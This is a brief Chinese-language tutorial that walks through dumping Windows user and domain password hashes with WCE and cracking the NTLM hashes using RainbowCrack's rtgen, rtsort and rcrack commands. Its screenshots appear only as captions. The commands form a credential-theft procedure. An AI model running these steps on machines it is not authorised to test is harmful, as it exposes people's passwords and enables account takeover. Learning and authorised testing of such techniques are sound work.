wce

ls /usr/share/wce

wce -l 列出曾经登陆过windows的用户HASH,获得了域用户的HASH,就用工具配合彩虹表破解(http://www.project-rainbowcrack.com/table.htm http://www.freerainbowtables.com),1分钟左右,密码就出来了。

Johnny可以对HASH进行破解得到密码。

 

cd /usr/share/rainbowcrack      (rainbowcrack下面有很多工具)

rtgen ntlm loweralpha 6 6 0 3800 335540 0          (制作彩虹表)(6位数密码,335540 chains)

 wce配合彩虹表破解windows的用户HASH_第1张图片

然后用    rtsort *.rt             (排序)

 

然后用rcrack破解windows的HASH

 

 wce配合彩虹表破解windows的用户HASH_第2张图片